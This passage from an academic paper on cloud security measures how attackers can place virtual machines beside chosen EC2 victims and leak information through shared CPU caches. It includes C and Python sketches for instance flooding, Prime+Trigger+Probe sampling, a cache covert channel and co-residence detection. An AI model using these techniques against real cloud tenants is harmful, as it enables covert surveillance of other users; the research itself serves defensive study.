We experimentally gauged this strategy's potential efficacy. We utilized as "victims" the subset of public EC2-based web servers surveyed in Section 5 that responded with HTTP 200 or 206 to a wget request on port 80. (This restriction is arbitrary. It only makes the task harder, since it cut down on the number of potential victims.) This left 6 577 servers. We targeted Zone 3 and m1.small instances and used our cloud map to infer which of the servers match this zone/type. This left 1 686 servers. (The choice of zone was arbitrary. The choice of instance type was due to the fact that m1.small instances enjoy the greatest use.) We collected data from numerous m1.small probe instances we launched in Zone 3. (These instances were also used in the course of our other experiments.) The probes were instrumented to perform the cheap co-residence check procedure described at the end of Section 6 for all of the targets. For any co-resident target, the probe performed a wget on port 80 (to ensure the target was still serving web pages). The wget scan of the EC2 servers was conducted on October 21, 2008, and the probes we analyzed were launched over the course of 18 days, starting on October 23, 2008. The time between individual probe launches varied, and most were launched in sets of 20.

We analyzed 1 785 such probe instances. These probes had 78 unique Dom0 IPs. (Thus, they landed on 78 different physical machines.) Of the 1 686 target victims, the probes achieved co-residency with 141 victim servers. Thus the "attack" achieved 8.4% coverage of the target set.

Discussion. We point out that the reported numbers are conservative in several ways, representing only a lower bound on the true success rate. We only report co-residence if the server is still serving web pages, even if the server was actually still running. The gap in time between our survey of the public EC2 servers and the launching of probes means that new web servers or ones that changed IPs (i.e. by being taken down and then relaunched) were not detected, even when we in fact achieved co-residence with them. We could have corrected some sources of false negatives by actively performing more internal port scans, but we limited ourselves to probing ports we knew to already be serving public web pages (as per the discussion in Section 4).

Our results suggest that even a very naive attack strategy can successfully achieve co-residence against a not-so-small fraction of targets. Of course, we considered here a large target set, and so we did not provide evidence of efficacy against an individual instance or a small set of targets. We observed very strong sequential locality in the data, which hinders the effectiveness of the attack. In particular, the growth in target set coverage as a function of the number of launched probes levels off quickly. (For example, in the data above, the first 510 launched probes had already achieved co-residence with 90% of the eventual 141 victims covered.) This suggests that fuller coverage of the target set could require many more probes.

7.2 Abusing Placement Locality

We would like to find attack strategies that do better than brute-force for individual targets or small target sets. Here we discuss an alternate adversarial strategy. We assume that an attacker can launch instances relatively soon after the launch of a target victim. The attacker then engages in instance flooding: running as many instances in parallel as possible (or as many as he or she is willing to pay for) in the appropriate availability zone and of the appropriate type. While an individual account is limited to 20 instances, it is trivial to gain access to more accounts. As we show, running probe instances temporally near the launch of a victim allows the attacker to effectively take advantage of the parallel placement locality exhibited by the EC2 placement algorithms.

But why would we expect that an attacker can launch instances soon after a particular target victim is launched? Here the dynamic nature of cloud computing plays well into the hands of creative adversaries. Recall that one of the main features of cloud computing is to only run servers when needed. This suggests that servers are often run on instances, terminated when not needed, and later run again. So, for example, an attacker can monitor a server's state (e.g., via network probing), wait until the instance disappears, and then, if it reappears as a new instance, engage in instance flooding. Even more interestingly, an attacker might be able to actively trigger new victim instances due to the use of auto-scaling systems. These automatically grow the number of instances used by a service to meet increases in demand. (Examples include scalr [30] and RightGrid [28]. See also [6].) We believe clever adversaries can find many other practical realizations of this attack scenario.
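One such realization is easy to sketch: poll the victim's public server from outside EC2 and flood as soon as it disappears and then reappears, presumably on a freshly launched instance. In the illustrative sketch below, launch_flood is a hypothetical helper that launches a wave of probe instances in the victim's zone and of the victim's type and applies the co-residence checks of Section 6; everything else is standard library code.

    import socket, time

    def is_up(host, port=80, timeout=3.0):
        # liveness probe: can we complete a TCP handshake with the victim's server?
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False

    def wait_for_relaunch_then_flood(victim_host, zone, instance_type,
                                     poll_interval=60, flood_size=20):
        """Poll the victim by its public DNS name (a relaunched instance usually
        gets a new IP, so poll by name rather than by address).  When the server
        disappears and later returns, it has likely been relaunched on a fresh
        instance, so flood immediately to exploit parallel placement locality.
        launch_flood is a hypothetical helper."""
        while is_up(victim_host):          # phase 1: wait for the current instance to go away
            time.sleep(poll_interval)
        while not is_up(victim_host):      # phase 2: wait for the service to reappear
            time.sleep(poll_interval)
        return launch_flood(zone, instance_type, flood_size)   # phase 3: instance flooding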
The rest of this section is devoted to quantifying several aspects of this attack strategy. We assess typical success rates; whether the availability zone, attacking account, or time of day has some bearing on success; and the effect of increased time lag between victim and attacker launches. Looking ahead: 40% of the time the attacker (launching just 20 probes) achieves co-residence against a specific target instance; zone, account, and time of day do not meaningfully impact success; and even if the adversary launches its instances two days after the victims' launch, it still enjoys the same rate of success.

In the following we will often use instances run by one of our own accounts as proxies for victims. However, we will also discuss achieving co-residence with recently launched commercial servers. Unless otherwise noted, we use m1.small instances. Co-residence checks were performed via comparison of Dom0 IPs.

The effects of zone, account, and time of day. We start with finding a baseline for success rates when running probe instances soon (on the order of 5 minutes) after victims. The first experiment worked as follows, and was repeated for each availability zone. A victim account launched either 1, 10, or 20 instances simultaneously. No sooner than five minutes later, a separate attacker account requested launch of 20 instances simultaneously. The number of collisions (attacker instances co-resident with a victim instance) is reported in the left table of Figure 3. As can be seen, collisions are quickly found for large percentages of victim instances. The availability zone used does not meaningfully affect co-residence rates.

We now focus on a single availability zone, Zone 1, for the next experiment. We repeated, at three different time periods over the course of a day, the following steps: a single victim instance was launched; no more than 5 minutes later, 20 probe instances were launched by another account and co-residence checks were performed. This process was repeated 10 times (with at least 5 minutes between the conclusion of one iteration and the beginning of the next). Each iteration used a fresh victim; odd iterations used one account and even iterations used another. The right table in Figure 3 displays the results. The results show a likelihood of achieving co-residence of 40%, slightly less than half the
# victims v    # probes p   coverage
                               1             20          1/1                               Account
                 Zone 1       10             20         5/10              Trial           A      B       Total
                              20             20         7/20             Midday
                                                                                         2/5     2/5     4/10
                               1             20          0/1       (11:13 – 14:22 PST)
                 Zone 2       10             18         3/10            Afternoon
                                                                                         1/5    3/5      4/10
                              20             19         8/20       (14:12 – 17:19 PST)
                               1             20          1/1              Night
                                                                                         2/5    2/5      4/10
                 Zone 3       10             20         2/10        (23:18 – 2:11 PST)
                              20             20         8/20

Figure 3: (Left) Results of launching p probes 5 minutes after the launch of v victims. The rightmost column specifies
success coverage: the number of victims for which a probe instance was co-resident over the total number of victims.
(Right) The number of victims for which a probe achieved co-residence for three separate runs of 10 repetitions of
launching 1 victim instance and, 5 minutes later, 20 probe instances. Odd-numbered repetitions used Account A;
even-numbered repetitions used Account B.

time a recently launched victim is quickly and easily "found" in the cloud. Moreover, neither the account used for the victims nor the portion of the day during which the experiment was conducted significantly affected the rate of success.

The effect of increased time lag. Here we show that the window of opportunity an attacker has for launching instances is quite large. We performed the following experiment. Forty victim instances (across two accounts) were initially launched in Zone 3 and continued running throughout the experiment. These were placed on 36 unique machines (8 victims were co-resident with another victim). Every hour a set of 20 attack instances (from a third account) was launched in the same zone and co-residence checks were performed. These instances were terminated immediately after completion of the checks. Figure 4 contains a graph showing the success rate of each attack round, which stays essentially the same over the course of the whole experiment. (No probes were reported for hours 34-43 because our scripts did not gracefully handle some kinds of EC2-caused launch failures. The gap nevertheless reveals useful information: the observed trends held whether or not probing was continuous.) Ultimately, co-residence was established with 24 of the 36 machines running victim instances. Additionally, probes were placed on all four machines that hosted two victim instances, thus giving three-way collisions.

The right graph in Figure 4 shows the cumulative number of unique Dom0 IP addresses seen by the probes over the course of the experiment. The growth in the number of machines on which probes were placed levels off rapidly — quantitative evidence of sequential placement locality.

On targeting commercial instances. We briefly experimented with targeted instance flooding against instances run by other users' accounts. RightScale is a company that offers "platform and consulting services that enable companies to create scalable web solutions running on Amazon Web Services" [28]. Presently, they provide a free demonstration of their services, complete with the ability to launch a custom EC2 instance. On two separate occasions, we set up distinct accounts with RightScale and used their web interface to launch one of their Internet appliances (on EC2). We then applied our attack strategy (mapping the fresh instance and then flooding). On the first occasion we sequentially launched two rounds of 20 instances (using a single account) before achieving co-residence with the RightScale instance. On the second occasion, we launched two rounds of 38 instances (using two accounts). In the second round, we achieved a three-way co-residency: an instance from each of our accounts was placed on the same machine as the RightScale server.

rPath is another company that offers ready-to-run Internet appliances powered by EC2 instances [29]. As with RightScale, they currently offer free demonstrations, launching on demand a fresh EC2 instance to host systems such as Sugar CRM, described as a "customer relationship management system for your small business or enterprise" [29]. We were able to successfully establish a co-resident instance against an rPath demonstration box using 40 instances. Subsequent attempts with fresh rPath instances on a second occasion proved less fruitful; we failed to achieve co-residence even after several rounds of flooding. We believe that the target in this case was placed on a full system and was therefore unassailable.

Discussion. We have seen that attackers can frequently achieve co-residence with specific targets. Why did the strategy fail when it did? We hypothesize that instance flooding failed when targets had been assigned to machines with high instance density (discussed further in Appendix B) or even to machines that had become full. While we would like to use network probing to better understand this effect, doing so would require port scanning IP addresses near those of the targets, which would perhaps violate (the spirit of) Amazon's AUP.

7.3    Patching placement vulnerabilities

The EC2 placement algorithms allow attackers to use relatively simple strategies to achieve co-residence with victims (that are not on fully-allocated machines). As discussed earlier, inhibiting cartography or co-residence checking (which would make exploiting placement more difficult) would seem insufficient to stop a dedicated attacker. On the other hand, there is a straightforward way to "patch" all placement vulnerabilities: offload choice to users. Namely, let users request placement of their VMs on machines that can only be populated by VMs from their (or other trusted) accounts. In exchange, the users can pay the opportunity cost of leaving some of these machines under-utilized. In an optimal assignment policy (for any particular instance type), this additional overhead should never need to exceed the cost of a single physical machine.
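To see why the overhead can be bounded this way, consider a greedy policy in which each account keeps (per instance type) at most one partially filled dedicated machine, and a new machine is allocated only when that one is full. The C sketch below illustrates the idea; it is not EC2's placement algorithm, and the slot count, data structures, and function name are our own assumptions.

/* Illustrative greedy policy for user-controlled ("dedicated")
 * placement. Not EC2's algorithm: the slot count and data structures
 * are assumptions. Each account keeps at most one partially filled
 * dedicated machine per instance type, so the under-utilized capacity
 * never exceeds a single physical machine. */
#include <stdlib.h>

#define SLOTS_PER_MACHINE 8       /* assumed VM slots per machine */

struct machine {
    int used;                     /* occupied slots               */
    struct machine *next;
};

struct account_pool {             /* one account, one instance type  */
    struct machine *open;         /* the lone partially full machine */
    struct machine *full;         /* completely full machines        */
};

/* Place one VM for this account; returns its host, or NULL on error. */
struct machine *place_dedicated(struct account_pool *pool) {
    if (pool->open == NULL) {
        pool->open = calloc(1, sizeof(struct machine));
        if (pool->open == NULL)
            return NULL;
    }
    struct machine *m = pool->open;
    m->used++;
    if (m->used == SLOTS_PER_MACHINE) {   /* machine filled: retire it   */
        m->next = pool->full;
        pool->full = m;
        pool->open = NULL;                /* invariant: at most one open */
    }
    return m;
}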
[Figure 4 plots: (left) the number of probe instances, showing "Total co-resident" and "New co-resident" against hours since victims launched; (right) the cumulative number of unique Dom0 assignments against hours since victims launched.]
Figure 4: Results for the experiment measuring the effects of increasing time lag between victim launch and probe
launch. Probe instances were not run for the hours 34–43. (Left) “Total co-resident” corresponds to the number of
probe instances at the indicated hour offset that were co-resident with at least one of the victims. “New co-resident”
is the number of victim instances that were collided with for the first time at the indicated hour offset. (Right) The
cumulative number of unique Dom0 IP addresses assigned to attack instances for each round of flooding.

8. CROSS-VM INFORMATION LEAKAGE

The previous sections have established that an attacker can often place his or her instance on the same physical machine as a target instance. In this section, we show the ability of a malicious instance to utilize side channels to learn information about co-resident instances. Namely, we show that (time-shared) caches allow an attacker to measure when other instances are experiencing computational load. Leaking such information might seem innocuous, but in fact it can already be quite useful to clever attackers. We introduce several novel applications of this side channel: robust co-residence detection (agnostic to network configuration), surreptitious detection of the rate of web traffic a co-resident site receives, and even timing keystrokes by an honest user (via SSH) of a co-resident instance. We have experimentally investigated the first two on running EC2 instances. For the keystroke timing attack, we performed experiments on an EC2-like virtualized environment.

On stealing cryptographic keys. There has been a long line of work (e.g., [10, 22, 26]) on extracting cryptographic secrets via cache-based side channels. Such attacks, in the context of third-party compute clouds, would be incredibly damaging — and since the same hardware channels exist, they are fundamentally just as feasible. In practice, cryptographic cross-VM attacks turn out to be somewhat more difficult to realize due to factors such as core migration, coarser scheduling algorithms, double indirection of memory addresses, and (in the case of EC2) unknown load from other instances and a fortuitous choice of CPU configuration (e.g., no hyperthreading). The side-channel attacks we report on in the rest of this section are more coarse-grained than those required to extract cryptographic keys. While this means the attacks extract fewer bits of information, it also means they are more robust and potentially simpler to implement in noisy environments such as EC2.

Other channels; denial of service. Not just the data cache but any physical machine resource multiplexed between the attacker and target forms a potentially useful channel: network access, CPU branch predictors and instruction cache [1, 2, 3, 12], DRAM memory bus [21], CPU pipelines (e.g., floating-point units) [4], scheduling of CPU cores and timeslices, disk access [16], etc. We have implemented and measured simple covert channels (in which two instances cooperate to send a message via a shared resource) using memory bus contention, obtaining a 0.006 bps channel between co-resident large instances, and using hard disk contention, obtaining a 0.0005 bps channel between co-resident m1.small instances. In both cases no attempts were made at optimizing the bandwidth of the covert channel. (The hard disk contention channel was used in Section 6 for establishing co-residence of instances.) Covert channels provide evidence that exploitable side channels may exist.

Though this is not our focus, we further observe that the same resources can also be used to mount cross-VM performance degradation and denial-of-service attacks, analogous to those demonstrated for non-virtualized multiprocessing [12, 13, 21].

8.1    Measuring cache usage

An attacking instance can measure the utilization of CPU caches on its physical machine. These measurements can be used to estimate the current load of the machine; a high load indicates activity on co-resident instances. Here we describe how to measure cache utilization in EC2 instances by adapting the Prime+Probe technique [22, 32]. We also demonstrate exploiting such cache measurements as a covert channel.

Load measurement. We utilize the Prime+Probe technique [22, 32] to measure cache activity, and extend it to the following Prime+Trigger+Probe measurement to support the setting of time-shared virtual machines (as present on Amazon EC2). The probing instance first allocates a contiguous buffer B of b bytes. Here b should be large enough that a significant portion of the cache is filled by B. Let s be the cache line size, in bytes. Then the probing instance performs the following steps to generate each load sample:
(1) Prime: Read B at s-byte offsets in order to ensure it is cached.
(2) Trigger: Busy-loop until the CPU's cycle counter jumps by a large value. (This means our VM was preempted by the Xen scheduler, hopefully in favor of the sender VM.)
(3) Probe: Measure the time it takes to again read B at s-byte offsets.
When reading the b/s memory locations in B, we use a pseudorandom order, and the pointer-chasing technique described in [32], to prevent the CPU's hardware prefetcher from hiding the access latencies. The time of the final step's read is the load sample, measured in number of CPU cycles. These load samples will be strongly correlated with use of the cache during the trigger step, since that usage will evict some portion of the buffer B and thereby drive up the read time during the probe phase.
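As a concrete illustration, the C sketch below generates a single load sample along these lines. It is a simplified sketch rather than our measurement code: it reuses the parameter values reported in Section 8.2 (b = 768 * 1024 and s = 128), treats an arbitrary cycle-counter jump as the preemption trigger, and builds the pointer chain with a crude fixed-stride permutation instead of the pseudorandom order of [32].

/* Illustrative sketch of one Prime+Trigger+Probe load sample.
 * Not our measurement code: B_BYTES and S reuse the values from
 * Section 8.2, TRIGGER_GAP is an arbitrary guess at a "large" cycle
 * jump, and build_chain() uses a crude fixed-stride permutation
 * instead of the pseudorandom order of [32]. Assumes x86-64 and C11. */
#include <stdint.h>
#include <stdlib.h>

#define B_BYTES (768 * 1024)   /* b: fills much of the L2 cache        */
#define S       128            /* s: probing stride (cache line size)  */
#define TRIGGER_GAP 100000     /* cycle jump treated as a preemption   */

static inline uint64_t rdtsc(void) {
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
}

/* Link the S-byte-spaced slots of buf into one cycle so that walking
 * it defeats the hardware prefetcher (a simplification of [32]). */
static void build_chain(uintptr_t *buf, size_t nlines) {
    size_t words_per_line = S / sizeof(uintptr_t);
    size_t step = nlines / 2 + 1;        /* assumed coprime with nlines */
    for (size_t i = 0; i < nlines; i++)
        buf[(i * step % nlines) * words_per_line] =
            (uintptr_t)&buf[((i + 1) * step % nlines) * words_per_line];
}

uint64_t load_sample(void) {
    size_t nlines = B_BYTES / S;
    uintptr_t *buf = aligned_alloc(S, B_BYTES);
    volatile uintptr_t *p;
    uint64_t t, prev, start;

    if (buf == NULL)
        return 0;
    build_chain(buf, nlines);

    /* (1) Prime: walk the chain once so that B is cached. */
    for (p = buf; *p != (uintptr_t)buf; p = (uintptr_t *)*p)
        ;

    /* (2) Trigger: busy-loop until the cycle counter jumps, i.e. Xen
     *     preempted us (hopefully in favor of a co-resident VM). */
    prev = rdtsc();
    for (;;) {
        t = rdtsc();
        if (t - prev > TRIGGER_GAP)
            break;
        prev = t;
    }

    /* (3) Probe: time a second walk; cache lines evicted during the
     *     trigger step show up here as extra cycles. */
    start = rdtsc();
    for (p = buf; *p != (uintptr_t)buf; p = (uintptr_t *)*p)
        ;
    t = rdtsc() - start;

    free(buf);
    return t;   /* the load sample, in CPU cycles */
}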
In the next few sections we describe several applications of this load measurement side channel. First we describe how to modify it to form a robust covert channel.

Cache-based covert channel. Cache load measurements create very effective covert channels between cooperating processes running in different VMs. In practice, this is not a major threat for current deployments, since in most cases the cooperating processes can simply talk to each other over a network. However, covert channels become significant when communication is (supposedly) forbidden by information flow control (IFC) mechanisms such as sandboxing and IFC kernels [34, 18, 19]. The latter are a promising emerging approach to improving security (e.g., web-server functionality [18]), and our results highlight a caveat to their effectiveness.

In the simplest cache covert-channel attack [15], the sender idles to transmit "0" and frantically accesses memory to transmit "1". The receiver accesses a memory block of his own and observes the access latencies. High latencies indicate that the sender is evicting the receiver's data from the caches, i.e., that "1" is transmitted. This attack is applicable across VMs, though it tends to be unreliable (and thus has very low bandwidth) in a noisy setting.

We have created a much more reliable and efficient cross-VM covert channel by using finer-grained measurements. We adapted the Prime+Trigger+Probe cache measurement technique as follows. Recall that in a set-associative cache, the pool of cache lines is partitioned into associativity sets, such that each memory address is mapped into a specific associativity set determined by certain bits in the address (for brevity, we ignore here details of virtual versus physical addresses). Our attack partitions the cache sets into two classes, "odd sets" and "even sets", and manipulates the load across each class. For resilience against noise, we use differential coding, where the signal is carried in the difference between the load on the two classes. Noise will typically be balanced between the two classes, and thus preserve the signal. (This argument can be made rigorous by using a random-number generator for the choice of classes, but the following simpler protocol works well in practice.)

The protocol has three parameters: a, which is larger than the attacked cache level (e.g., a = 2^21 to attack the Opteron L2 cache on EC2); b, which is slightly smaller than the attacked cache level (here, b = 2^19); and d, which is the cache line size times a power of 2. Define even addresses (resp. odd addresses) as those that are equal to 0 mod 2d (resp. d mod 2d). Define the class of even cache sets (resp. odd cache sets) as those cache sets to which even (resp. odd) addresses are mapped.

The sender allocates a contiguous buffer A of a bytes. To transmit "0" (resp. "1") he reads the even (resp. odd) addresses in A. This ensures that one class of cache sets is fully evicted from the cache, while the other is mostly untouched.

The receiver determines the transmitted bit by the following measurement procedure:
(1) Allocate a contiguous buffer B of b bytes.
(2) Sleep briefly (to build up credit with Xen's scheduler).
(3) Prime: Read all of B to make sure it is fully cached.
(4) Trigger: Busy-loop until the CPU's cycle counter jumps by a large value. (This means our VM was preempted by the Xen scheduler, hopefully in favor of the sender VM.)
(5) Probe: Measure the time it takes to read all even addresses in B, and likewise for the odd addresses. Decide "0" iff the difference is positive.

On EC2 we need to deal with the noise induced by the fact that each VM's virtual CPU is occasionally migrated between the (m1.small) machine's four cores. This also leads to sometimes capturing noise generated by VMs other than the target (sender). Due to the noise-cancelling property of differential encoding, we can use a straightforward strategy: the receiver takes the average of multiple samples when making his decision, and also reverts to the prime stage whenever it detects that Xen scheduled it to a different core during the trigger or probe stages. This simple solution already yields a bandwidth of approximately 0.2 bps, running on EC2.
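The C sketch below illustrates the receiver's side of this differential protocol. It is illustrative only, not our implementation: it assumes a 64-byte cache line (so d = 128) and b = 2^19, uses an arbitrary preemption threshold, takes the probed difference to be the even-class time minus the odd-class time, and omits both the per-bit averaging and the core-migration check described above. The buffer buf is assumed to be the contiguous b-byte allocation of step (1).

/* Illustrative sketch of the receiver of the even/odd cache-set covert
 * channel. Assumptions: 64-byte cache line (so d = 128), b = 2^19, an
 * arbitrary preemption threshold, and difference = even - odd. */
#include <stddef.h>
#include <stdint.h>
#include <unistd.h>

#define B_BYTES (1 << 19)   /* b: slightly smaller than the L2 cache  */
#define D       128         /* d: cache line size (64) times 2        */
#define TRIGGER_GAP 100000  /* cycle jump treated as a preemption     */

static inline uint64_t rdtsc(void) {
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
}

/* Time the reads of all addresses in buf congruent to phase mod 2d. */
static uint64_t time_class(volatile uint8_t *buf, size_t phase) {
    uint64_t start = rdtsc();
    for (size_t off = phase; off < B_BYTES; off += 2 * D)
        (void)buf[off];
    return rdtsc() - start;
}

/* Receive one bit over the cache channel. */
int receive_bit(volatile uint8_t *buf) {
    uint64_t t, prev, even, odd;

    usleep(1000);                           /* (2) build scheduler credit */

    for (size_t off = 0; off < B_BYTES; off += 64)
        (void)buf[off];                     /* (3) Prime: cache all of B  */

    prev = rdtsc();                         /* (4) Trigger: wait for a    */
    for (;;) {                              /*     large cycle jump       */
        t = rdtsc();
        if (t - prev > TRIGGER_GAP)
            break;
        prev = t;
    }

    even = time_class(buf, 0);              /* (5) Probe both classes     */
    odd  = time_class(buf, D);

    /* "0" was sent iff the even sets were evicted, i.e. even - odd > 0. */
    return (even > odd) ? 0 : 1;
}

A sender sketch is symmetric: for the duration of one bit it simply reads, in a tight loop, the even or odd addresses of its own a-byte buffer, as described above.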
8.2    Load-based co-residence detection

Here we positively answer the following question: can one test co-residence without relying on the network-based techniques of Section 6? We show this is indeed possible, given some knowledge of computational load variation on the target instance. This condition holds when an adversary can actively cause load variation due to a publicly-accessible service running on the target. It might also hold in cases where an adversary has a priori information about load variation on the target and this load variation is (relatively) unique to the target.

Consider target instances for which we can induce computational load — for example, an instance running a (public) web server. In this case, an attacker instance can check for co-residence with a target instance by observing differences in load samples taken when externally inducing load on the target versus when not. We experimentally verified the efficacy of this approach on EC2 m1.small instances. The target instance ran Fedora Core 4 with Apache 2.0. A single 1024-byte text-only HTML page was made publicly accessible. Then the co-residence check worked as follows. First, the attacker VM took 100 load samples. (We set b = 768 * 1024 and s = 128. Taking 100 load samples took about 12 seconds.) We then paused for ten seconds. Then we took 100 further load samples while simultaneously making numerous HTTP get requests from a third system to the target via jmeter 2.3.4 (a utility for load testing HTTP servers). We set jmeter to simulate 100 users (100 separate threads). Each user made HTTP get requests as fast as possible.
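The decision step of this check can be as simple as comparing the means of the two sets of load samples. The C sketch below illustrates one such decision rule; it is not the code we ran. Here load_sample() refers to the Section 8.1 sketch, the threshold ratio is an arbitrary assumption, and coordination with the third machine issuing the HTTP gets is left implicit; the trials reported below instead compare the two sample sets visually (Figure 5).

/* Illustrative sketch of the decision step of the load-based check.
 * Not the code we ran: load_sample() is the Prime+Trigger+Probe sketch
 * from Section 8.1, THRESHOLD is an arbitrary assumption, and the
 * external HTTP flood is assumed to start during the 10 s pause. */
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

#define N_SAMPLES 100
#define THRESHOLD 1.3   /* assumed ratio separating "loaded" from "idle" */

extern uint64_t load_sample(void);   /* from the Section 8.1 sketch */

static double mean_load(void) {
    double sum = 0.0;
    for (int i = 0; i < N_SAMPLES; i++)
        sum += (double)load_sample();
    return sum / N_SAMPLES;
}

int main(void) {
    /* Phase 1: 100 load samples with the target left alone. */
    double quiet = mean_load();

    sleep(10);   /* pause; a third machine now starts issuing HTTP gets */

    /* Phase 2: 100 load samples while the target's web server is
     * being flooded with requests (e.g., by a load-testing tool). */
    double busy = mean_load();

    printf("quiet mean = %.0f cycles, busy mean = %.0f cycles\n",
           quiet, busy);
    puts(busy > THRESHOLD * quiet ? "likely co-resident with the target"
                                  : "no evidence of co-residence");
    return 0;
}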
The results of three trials with three pairs of m1.small instances are plotted in Figure 5. In the first trial we used two instances known to be co-resident (via network-based co-residence checks). One can see the difference between the load samples when performing HTTP gets and when not. In the second trial we used a fresh pair of instances co-resident on a different machine, and again one can easily see the effect of the HTTP gets on the load samples. In the third trial, we used two instances that were not co-resident. Here the load sample timings are, as expected, very similar. We emphasize that these measurements were performed on live EC2 instances, without any knowledge of what other instances may (or may not) have been running on the same machines. Indeed, the several spikes present in Trial 2's